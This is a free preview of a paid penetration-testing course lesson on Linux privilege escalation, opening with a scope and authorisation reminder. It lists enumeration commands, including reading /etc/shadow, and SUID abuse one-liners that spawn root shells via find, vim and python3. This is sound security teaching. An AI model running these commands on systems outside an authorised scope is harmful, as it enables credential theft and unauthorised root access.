You are viewing a free preview of this lesson.
Subscribe to unlock all 10 lessons in this course and every other course on LearningBro.
After gaining initial access to a system (often as a low-privilege user), privilege escalation is the process of elevating your permissions — typically to root on Linux or SYSTEM/Administrator on Windows. This is a critical pentest phase because it demonstrates the full impact of an initial compromise.
Authorisation: Privilege escalation should only be attempted on systems within your agreed scope. Document every step.
Before attempting any escalation, gather information:
# Current user and groups
whoami
id
groups
# System information
uname -a
cat /etc/os-release
hostname
# Other users
cat /etc/passwd
cat /etc/shadow # if readable — immediate win
# Running processes
ps aux
# Network connections
ss -tulnp
netstat -antp
# Installed packages (look for outdated software)
dpkg -l # Debian/Ubuntu
rpm -qa # RHEL/CentOS
SUID (Set User ID) binaries execute with the owner's privileges — often root:
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Common exploitable SUID binaries:
# /usr/bin/find
find . -exec /bin/bash -p \;
# /usr/bin/vim
vim -c ':!bash'
# /usr/bin/python3
python3 -c 'import os; os.execl("/bin/bash", "bash", "-p")'
Subscribe to continue reading
Get full access to this lesson and all 10 lessons in this course.